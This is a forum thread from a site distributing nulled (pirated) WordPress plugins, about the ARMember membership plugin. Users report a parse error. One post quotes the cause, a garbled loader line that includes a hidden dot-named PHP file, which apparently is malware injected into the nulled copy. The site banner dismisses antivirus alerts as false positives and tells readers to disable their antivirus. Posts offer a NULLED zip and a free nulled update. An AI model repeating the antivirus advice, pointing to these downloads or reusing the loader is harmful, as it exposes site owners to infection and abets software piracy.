• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

ARMember - WordPress Membership Plugin

ARMember - WordPress Membership Plugin v6.6

No permission to download
Unable to activate the plugin

Plugin could not be activated because it triggered a fatal error.

Parse error: syntax error, unexpected 'if' (T_IF), expecting function (T_FUNCTION) or const (T_CONST) in /home2/newsocea/app.newsocean.com.ng/wp-content/plugins/armember/core/classes/class.arm_modal_view_in_menu.php on line 35
fronted ad backend work good in my side
work good in my side.jpg

Parse error: syntax error, unexpected 'if' (T_IF), expecting function (T_FUNCTION) or const (T_CONST) in /home/voutax.com/public_html/wp-content/plugins/armember/core/classes/class.arm_modal_view_in_menu.php on line 35 \

how to fix these guys ??

Unable to activate the plugin

Plugin could not be activated because it triggered a fatal error.

Parse error: syntax error, unexpected 'if' (T_IF), expecting function (T_FUNCTION) or const (T_CONST) in /home2/newsocea/app.newsocean.com.ng/wp-content/plugins/armember/core/classes/class.arm_modal_view_in_menu.php on line 35
did you found how to fix it ?

guys this code causes problem at this plugin does anyone know the solution it says unexpected t_function t_if t_cons
if function (!file_exists ($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname) (__FILE__) . '.php') && !class_exists ('WPTemplatesOptions') {
include_once($filename);
}

This plugin (ARMember) messes up user menu on PC.
I mean, the pages of the plugin will not display your menus on PC.
I even installed the Lite version, the same thing.
-
EDIT:
If you activate "Load JS & CSS in all pages", all the pages will stop showing your menus, if you deactivate it, only the plugin pages will not show menus.

are u sure ?
no it wasn't like that
but it has some problem and I don't think I can handle it
Parse error: syntax error, unexpected 'if' (T_IF), expecting function (T_FUNCTION) or const (T_CONST) in /home/voutax.com/public_html/wp-content/plugins/armember/core/classes/class.arm_modal_view_in_menu.php on line 35

Please test and report back. :)

Attachments

• codecanyon-armember-complete-wordpress-membership-system-4.0.2_NULLED.zip
    12.7 MB · Views: 16
  • Love
Reactions: Babak
Hi, Direct Login addon is free with Armember but it isn't possible to install it ...

Babak updated ARMember - WordPress Membership Plugin with a new update entry:

ARMember Plugin v4.1 Nulled

Download ARMember v4.1 - WordPress Membership Plugin Nulled Free
Version 4.1 ( 04 November, 2020)

• Added Facility to purchase paid post with WooCommerce Checkout
  • Added advanced filters in Member Directory Templates.
  • Added New Report “Paid Post Report” for Paid Post purchases.
  • Added support of new shortcodes in email notification templates : Coupon Code
  • Added Facility to add Login link in signup form.
  • Added BuddyBoss Support.
  • Added Facility to apply Content...

Read the rest of this update entry...

Reactions: JRGWxRxZ

Forum statistics

Threads
Members
Latest member
raddos2030
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock